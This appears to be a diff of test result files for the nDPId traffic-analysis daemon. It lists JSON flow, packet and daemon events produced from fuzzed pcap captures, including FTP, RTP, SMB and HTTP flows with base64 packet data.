00593{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635048,"flow_last_seen":1120469635048,"flow_idle_time":7440000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":59,"flow_avg_l4_payload_len":59,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.168.1.2","src_port":21,"dst_port":2732,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00837{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635012,"flow_last_seen":1120469635012,"flow_idle_time":7560000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":12,"flow_avg_l4_payload_len":12,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"147.234.1.253","src_port":2679,"dst_port":21,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by port"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"},"ftp": {"user":"","password":"d0xa!","auth_failed":0}}
00593{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635012,"flow_last_seen":1120469635012,"flow_idle_time":7560000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":12,"flow_avg_l4_payload_len":12,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"147.234.1.253","src_port":2679,"dst_port":21,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00828{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635106,"flow_last_seen":1120469635106,"flow_idle_time":7560000,"flow_min_l4_payload_len":6,"flow_max_l4_payload_len":6,"flow_tot_l4_payload_len":6,"flow_avg_l4_payload_len":6,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.112.1.2","dst_ip":"147.234.1.253","src_port":2720,"dst_port":21,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by port"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"},"ftp": {"user":"","password":"","auth_failed":0}}
00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635106,"flow_last_seen":1120469635106,"flow_idle_time":7560000,"flow_min_l4_payload_len":6,"flow_max_l4_payload_len":6,"flow_tot_l4_payload_len":6,"flow_avg_l4_payload_len":6,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.112.1.2","dst_ip":"147.234.1.253","src_port":2720,"dst_port":21,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00833{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635043,"flow_last_seen":1120469635043,"flow_idle_time":7560000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.168.1.66","src_port":21,"dst_port":2720,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by port"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"},"ftp": {"user":"","password":"","auth_failed":0}}
00594{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635043,"flow_last_seen":1120469635043,"flow_idle_time":7560000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.168.1.66","src_port":21,"dst_port":2720,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00833{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635052,"flow_last_seen":1120469635052,"flow_idle_time":7560000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":41,"flow_avg_l4_payload_len":41,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.168.65.2","src_port":21,"dst_port":2720,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by port"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"},"ftp": {"user":"","password":"","auth_failed":0}}
00594{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635052,"flow_last_seen":1120469635052,"flow_idle_time":7560000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":41,"flow_avg_l4_payload_len":41,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.168.65.2","src_port":21,"dst_port":2720,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00832{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635048,"flow_last_seen":1120469635048,"flow_idle_time":7560000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":59,"flow_avg_l4_payload_len":59,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.168.1.2","src_port":21,"dst_port":2732,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by port"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"},"ftp": {"user":"","password":"","auth_failed":0}}
00593{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635048,"flow_last_seen":1120469635048,"flow_idle_time":7560000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":59,"flow_avg_l4_payload_len":59,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.168.1.2","src_port":21,"dst_port":2732,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":229,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470985511,"flow_last_seen":1120470985511,"flow_idle_time":180000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"81.168.1.2","dst_ip":"212.242.33.36","src_port":30000,"dst_port":40392,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"RTP","breed":"Acceptable","category":"Media"}}
00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":227,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1120470985421,"flow_last_seen":1120470985466,"flow_idle_time":180000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":860,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.36","src_port":30000,"dst_port":40392,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"RTP","breed":"Acceptable","category":"Media"}}
00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":225,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470985348,"flow_last_seen":1120470985348,"flow_idle_time":180000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"212.242.33.36","src_port":30000,"dst_port":40392,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"RTP","breed":"Acceptable","category":"Media"}}
00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":228,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470985504,"flow_last_seen":1120470985504,"flow_idle_time":180000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"214.242.33.36","src_port":30000,"dst_port":40392,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"RTP","breed":"Acceptable","category":"Media"}}
00658{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120469611651,"flow_last_seen":1120469620579,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"147.137.21.94","src_port":2717,"dst_port":445,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"SMBv23","breed":"Acceptable","category":"System"}}
00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120469611651,"flow_last_seen":1120469620579,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"147.137.21.94","src_port":2717,"dst_port":445,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00658{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120469611651,"flow_last_seen":1120469620579,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"147.137.21.94","src_port":2717,"dst_port":445,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"SMBv23","breed":"Acceptable","category":"System"}}
00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120469611651,"flow_last_seen":1120469620579,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"147.137.21.94","src_port":2717,"dst_port":445,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":239,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471053339,"flow_last_seen":1120471053339,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.170.1.1","src_port":2827,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":226,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470985418,"flow_last_seen":1120470985418,"flow_idle_time":180000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"37.115.0.36","src_port":30000,"dst_port":40392,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"RTP","breed":"Acceptable","category":"Media"}}
00832{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635010,"flow_last_seen":1120469635010,"flow_idle_time":7440000,"flow_min_l4_payload_len":76,"flow_max_l4_payload_len":76,"flow_tot_l4_payload_len":76,"flow_avg_l4_payload_len":76,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.169.1.2","src_port":21,"dst_port":2720,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by port"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"},"ftp": {"user":"","password":"","auth_failed":0}}
00593{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635010,"flow_last_seen":1120469635010,"flow_idle_time":7440000,"flow_min_l4_payload_len":76,"flow_max_l4_payload_len":76,"flow_tot_l4_payload_len":76,"flow_avg_l4_payload_len":76,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.169.1.2","src_port":21,"dst_port":2720,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00832{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635010,"flow_last_seen":1120469635010,"flow_idle_time":7560000,"flow_min_l4_payload_len":76,"flow_max_l4_payload_len":76,"flow_tot_l4_payload_len":76,"flow_avg_l4_payload_len":76,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.169.1.2","src_port":21,"dst_port":2720,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by port"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"},"ftp": {"user":"","password":"","auth_failed":0}}
00593{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635010,"flow_last_seen":1120469635010,"flow_idle_time":7560000,"flow_min_l4_payload_len":76,"flow_max_l4_payload_len":76,"flow_tot_l4_payload_len":76,"flow_avg_l4_payload_len":76,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.169.1.2","src_port":21,"dst_port":2720,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00582{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","packets-captured":691,"packets-processed":554,"total-skipped-flows":0,"total-l4-data-len":58605,"total-not-detected-flows":27,"total-guessed-flows":28,"total-detected-flows":194,"total-detection-updates":88,"total-updates":33,"current-active-flows":0,"total-active-flows":249,"total-idle-flows":249,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":1435,"global_ts_msec":1120471107427}
~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
~~ packets captured/processed: 691/554

342
test/results/fuzz-2006-09-29-28586.pcap.out
View File

@@ -2,207 +2,207 @@
00558{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1031854484481}
00197{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":1,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","layer_type":2304,"global_ts_msec":1031854484481}
00351{"packet_event_id":1,"packet_event_name":"packet","packet_id":1,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":2304,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"CAAgsl17AFCLk5N8CQBFAAAo8EpAAIAGrEqsFAMFrBQDDQooAFDkFf3+yWv\/bVARIal6iQAABIGD1GDD"}
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854484481,"flow_last_seen":1031854484481,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854484481,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2600,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1031854484481,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1031854484481,"pkt":"AFCLk5N8CAAgsl17CABFAAAoxKVAAEAGF\/CsFAMNrBQDBQBQCijJa\/9t5BX9\/1AQgywZBgAA"}
00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1031854484481,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1031854484481,"pkt":"AFCLk5N8CAAgsl17CABFAAAoxKZAAEAGF++sFAMNrBQDBQBQCijJa\/9t5BX9\/1ARgywZBQAA"}
00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1031854484482,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1031854484482,"pkt":"CAAgsl17AFCLk5N8CABFAAAo8UpAAIAGq0qsFAMFrBQDDQooAFDkFf3\/yWv\/blAQIal6iAAABIGD1GDD"}
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854484481,"flow_last_seen":1031854484481,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854484481,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2600,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1031854484481,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1031854484481,"pkt":"AFCLk5N8CAAgsl17CABFAAAoxKVAAEAGF\/CsFAMNrBQDBQBQCijJa\/9t5BX9\/1AQgywZBgAA"}
00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1031854484481,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1031854484481,"pkt":"AFCLk5N8CAAgsl17CABFAAAoxKZAAEAGF++sFAMNrBQDBQBQCijJa\/9t5BX9\/1ARgywZBQAA"}
00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1031854484482,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1031854484482,"pkt":"CAAgsl17AFCLk5N8CABFAAAo8UpAAIAGq0qsFAMFrBQDDQooAFDkFf3\/yWv\/blAQIal6iAAABIGD1GDD"}
00197{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":5,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","layer_type":2246,"global_ts_msec":1031854488666}
00362{"packet_event_id":1,"packet_event_name":"packet","packet_id":5,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":2246,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1031854484482,"pkt":"CAAgsl17AFCLk5J8CMZFAAAs9EpAAIAGqEasFAMFrBQDDQopAFDkS6qJAAAAACUCMACAnQAAuAQFtGBh"}
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854488666,"flow_last_seen":1031854488666,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1031854488666,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2601,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1031854488666,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1031854488666,"pkt":"AFCLk5N8CAAgsl17CABFAAAsxKdAAEAGF+qsFAMNrBQDBQBQCinJpw1U5EuqimASgyxGZAAAAgQFtA=="}
00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1031854488666,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1031854488666,"pkt":"CAAgsl17AFCLk5N8CABFAAAo9UpAAIAGp0qsFAMFrBQDDQopAFDkS6qKyacNVVAQIji\/FQAAAgQFtGDD"}
02416{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1031854488667,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":1031854488667,"pkt":"CAAgsl17AFCLk5N8CABFAAXc9kpAAIAGoJasFAMFrBQDDQopAFDkS6qKyacNVVAQIjheTQAAUE9TVCAvc2VydmxldHMvbW1zIEhUVFAvMS4xDQpIb3N8OiAxNzIuMjAuMy4xMw0KT3B0OiDQaHR0cDovL3d3dy53My5vcmdtMTk5OS8wNi8yNC1DQ1BQZXhjaGFuZ2UiOyBucz01Ng0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi92bmQud2FwLm1tcy1tZXNzYWdlDQpBY2NlcHQ6IGFwcGxpY2F0aW9uL3ZuZC53YXAubW1zLW1lc3NhZ2UNCkNhY2hlLUNvbnRyb2w6IG5vLWNhY2hlDQpBY2NlcHQtTGFuZ3VhZ2U6IGVuDQpVc2VyLUFnZW50OiBTb255RXJpY3Nzb25UNjgvUjIwMUENCkFjY2VwdC1DaGFyc2V0OiAqDQo1Ni1Qcm9maWxlLURpZmYtMTowPD94bWwgdmVyc2lvbj0iMS4wIj8+PHJkZjpSREYgeG1sbnM6cmRmPSJodHRwOi8vd3d3Lnd2Lm9yZy8xOTk5LzAyL6qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq